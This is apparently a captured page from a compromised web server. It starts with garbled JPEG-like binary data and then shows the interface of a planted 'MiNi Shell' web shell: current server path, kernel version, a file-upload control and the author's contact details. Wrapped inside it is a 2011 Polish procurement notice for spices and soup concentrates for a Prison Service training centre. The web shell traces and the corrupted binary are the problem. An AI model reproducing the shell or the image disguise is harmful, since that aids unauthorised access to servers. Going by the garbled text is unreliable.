JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110415/80560-N-2011.html

<p class="kh_header"><b>Kikity: Sukcesywne dostawy przypraw i koncentratów  do Ośrodka Doskonalenia Kadr Służby Więziennej w Kikitach</b><br>
<b>Numer ogłoszenia: 80560 - 2011; data zamieszczenia: 15.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Kadr Służby Więziennej , Kikity 33, 11-332 Kikity, woj. warmińsko-mazurskie, tel. 0-89 718-11-23, faks 0-89 718-11-23 wew. 303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy przypraw i koncentratów  do Ośrodka Doskonalenia Kadr Służby Więziennej w Kikitach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp
	Nazwa artykułu
	j.m.
	Ilość

1
	2	3	4
1	Żurek w proszku 1,4kg	Kg	20
2	Żelatyna 20g	Szt.	25
3	Zupa brokułowa 1,3 kg
Wydajność nie mniejsza niż 15 l	Szt	10
4	Zupa krem z borowików 1.4 kg
Wydajność nie mniejsza niż 12 l	Szt	10
5	Ziele angielskie 20g	Szt.	50
6	Sól 1kg	Kg	50
7	Sos z zielonym pieprzem 1,2 kg
Wydajność nie mniejsza niż 12 l	Szt	15
8	Sos węgierski 1,2 kg
Wydajność nie mniejsza niż 10 l	Szt	3
9	Sos sałatkowo czosnkowy 0,7kg	Szt	2
10	Sos Pieczeniowy 1,2 kg
Wydajność nie mniejsza niż 12 l	Szt	5
11	Sos pieczarkowo-borowikowy 1kg 	Szt	10
12	Sos ogrodowy 0,7kg 	Szt	5
13	Sos koperkowy sałatkowy 0,8kg	Szt	10
14	Sos do spaghetti Napoli 1 kg
Wydajność nie mniejsza niż 5 l	Szt	10
15	Rosół wołowy w paście 0,5kg
Wydajność nie mniejsza niż 23 l	szt	20
16	Sos cygański 1,1kg	Szt	5
17	Sos włoski 0,7kg	Szt	5
18	Przyprawa do zup  w płynie 0,86 l	L	30
19	Przyprawa curry 20g	Szt.	20
20	Pieprz naturalny 20g	Szt.	1300
21	Papryka ostra 20g	Szt.	300
22	Ocet 0,5l	L	25
23	Musztarda 1 kg	Kg	50
24	Majonez  dekoracyjny 3kg	Kg	70
25	Majeranek 20g	Szt.	100
26	Liść laurowy 15g	Szt.	50
27	Kwasek cytrynowy 20g	Szt.	50
28	Sos Pieczeniowy o smaku drobiowym 1,2 kg
Wydajność nie mniejsza niż 17 l
	szt	5
29	Kurkuma 20g	szt	20
30	Przyprawa do ryb 0,6kg	Szt	15
31	Przyprawa do grila 0,5kg	Szt	5
32	Przyprawa do drobiu  0,6kg	szt	35
33	Przyprawa do potraw op.1kg typu vegeta	Kg	200
34	Marynata do ryb i owoców morza 700g	szt	6
35	Marynata do wieprzowiny 750g	szt	5
36	Marynata do wołowiny 750g	szt	5
37	Tymianek 20g	szt	20
40	Przyprawa w paście czosnkowa 340g	szt	5
41	Przyprawa w paście czerwone pesto 340g	szt	5
42	Przyprawa w paście grzybowa  340g	Szt	5
43	Przyprawa w paście prowansalska 340g	Szt	5
44	Przyprawa w paście Włoska 340g	szt	5
45	Czosnek granulowany 500g 	Szt	4
46	Auszpik 0,8kg	Szt	20
47	Przyprawa w płynie cielęca 1l 	Szt	5
48	Przyprawa w płynie z kury 1l	Szt	3
49	Przyprawa w płynie  wołowa1l 	Szt	3
50	Sos do dziczyzny i innych ciemnych mięs 1,3kg  	Szt	3
51	Sos typu Cafe de Paris 0,8 kg
Wydajność nie mniejsza niż 4 l	Szt	30
52	Sos cytrynowo - maślany 0,7 kg
Wydajność nie mniejsza niż 3 l	Szt	20
53	Sos grzybowy 1,1 kg
Wydajność nie mniejsza niż 8 l	Szt	7
54	Sos Myśliwski 1,1 kg
Wydajność nie mniejsza niż 8 l	Szt	10
55	Sos holenderski 0,9 kg
 Wydajność nie mniejsza niż 5 l	Szt	4
56	Sos słodko-kwaśny 1,5 kg
 Wydajność nie mniejsza niż 7,5 l	Szt	5
57	Sos ziołowy 1kg
Wydajność nie mniejsza niż 7 l	Szt	5
58	Przyprawa do gulaszu 1,1 kg typu FIX
Wydajność nie mniejsza niż 9 l	Szt	5
59	Przyprawa do potraw chińskich 0,7 kg typu FIX
Wydajność nie mniejsza niż 5 l	Szt	10
60	Sos cztery sery z brokułami 0,9 kg
Wydajność nie mniejsza niż 5 l	Szt	15
61	Sos sałatkowy tysiąca wysp  0,7kg	Szt	5
62	Napój w proszek 1kg 
Wydajność nie mniejsza niż 10 l	Kg.	250
63	Zasmażka jasna 1kg	Szt.	3
64	Zasmażka ciemna 1kg	Szt.	5
65	Zabielacz do zup i sosów 15% 1l  typu Rama cremefine profi
	Szt.	250
66	Tłuszcz roślinny 0,9l do smażenia typu Rama cullinesse	Szt.	50
67	Tłuszcz do pieczenia 3,7l typu Rama combi profi


	Szt.	10



68	Sos z czerwonej cebuli 900g
Wydajność nie mniejsza niż 6 l	Szt.	15
69	Barszcz Biały 3kg
Wydajność nie mniejsza niż 51l	Szt.	10
70	Zupa toskańska 1,2 kg
Wydajność nie mniejsza niż 12 l	Szt.	5
71	Zupa minestrone 1,2kg	Szt.	2
72	Przyprawa do ziemniaków 30g	Szt.	160
73	Zioła prowansalskie  10g	Szt.	20
74	Koncentrat  30%  0.8kg	szt	200
75	Keczap  490g	szt	200
76	Keczap  2,5kg	szt	15
77	Przyprawa do mięs 	kg	5
78	Zupa ogonowa 3kg
Wydajność nie mniejsza niż 25l	szt	5
79	Zupa szparagowa 3kg
Wydajność nie mniejsza niż 37 l	szt	5
80	Peperonata 2,5 kg	szt	2
81	Sos w płynie Holenderski 1l	l	5
82	Sos w płynie pieprzowy 1l	l	5
86	Sos w płynie serowy 1l	l	5
87	Puree ziołowe Curry 750g	szt	7
88	Puree ziołowe pieprzowe 750g	szt	10
89	Puree ziołowe paprykowe 750g	szt	10
90	Rosół jarzynowy 15 kg
Wydajność nie mniejsza niż 750 l	szt	1
91	Marynata do kurczaka 700g	szt	3
92	Przyprawa do gyrosa 0,5kg	szt	3
93	Przyprawa w paście bazyliowa 340g	szt	4
94	Sos sałatkowy balsamico 0,7kg	szt	5
95	Sos sałatkowy grecki 0,7kg

	szt	3
96	Zupa cebulowa 630 g
Wydajność nie mniejsza niż 8 l	szt	2
97	Zupa krem z pieczarek 1,2 kg
Wydajność nie mniejsza niż 14 l	szt	5
98	Zupa porowa 2,9 kg
Wydajność nie mniejsza niż 40 l	szt	1
99	Barszcz czerwony 3kg
Wydajność nie mniejsza niż 37l	szt.	3
100	Rosół wołowy 0,9 kg
Wydajność nie mniejsza niż 36 l	szt.	15
101	Zupa toskańska 1,2 kg
Wydajność nie mniejsza niż 12 l	szt	4
102	Rosół o smaku wędzonki 1 kg
Wydajność nie mniejsza niż 50 l	szt	4
103	Rosół z kury 1 kg
Wydajność nie mniejsza niż 40 l	szt	50
104	Bulion grzybowy 1 kg
Wydajność nie mniejsza niż 50 l	szt	4
105	Sos do spaghetti Carbonara 0,9 kg
Wydajność nie mniejsza niż 4 l	szt	4
106	Sos do spaghetti Bolognese 1,1 kg
Wydajność nie mniejsza niż 6 l	szt	5
107	Przyprawa do potraw meksykańskich 1 kg typu FIX
-Wydajność niemniejsza niż 5 l	szt	10
108	Przyprawa do potraw meksykańskich 1 kg typu FIX
Wydajność nie mniejsza niż 5 l	szt	5
109	Zupa kalafiorowa 3kg
Wydajność nie mniejsza niż 34l	Szt	3
110	Zupa pieczarkowa baza 3kg
Wydajność: 38l	Szt	2
111	Zupa pieczarkowa 3kg
Wydajność nie mniejsza niż 38l	Szt	1
112	Żurek 3kg
Wydajność nie mniejsza niż 57l	Szt	5.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Oświadczenia zgodnie z wymaganiami art. 22 ust.1 Ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Oświadczenia zgodnie z wymaganiami art. 22 ust.1 Ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Oświadczenia zgodnie z wymaganiami art. 22 ust.1 Ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Oświadczenia zgodnie z wymaganiami art. 22 ust.1 Ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Oświadczenia zgodnie z wymaganiami art. 22 ust.1 Ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ceny jednostkowe nie mogą ulec zmianie w trakcie obowiązywania umowy, za wyjątkiem: zmiany obowiązującej stawki podatku VAT. Umowa ulegnie zmianie w zakresie zmiany obowiązującej stawki podatku VAT oraz wartości brutto przy zachowaniu niezmiennych cen jednostkowych netto przedmiotu zamówienia oraz wartości netto umowy o którym mowa w § 4 ust. 1 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Doskonalenia  Kadr Słuzby Więziennej w Kikitach
Kikity 33
11-332 Lutry.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2011 godzina 08:45, miejsce: Ośrodek Doskonalenia  Kadr Słuzby Więziennej w Kikitach
Kikity 33
11-332 Lutry
Recepcja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com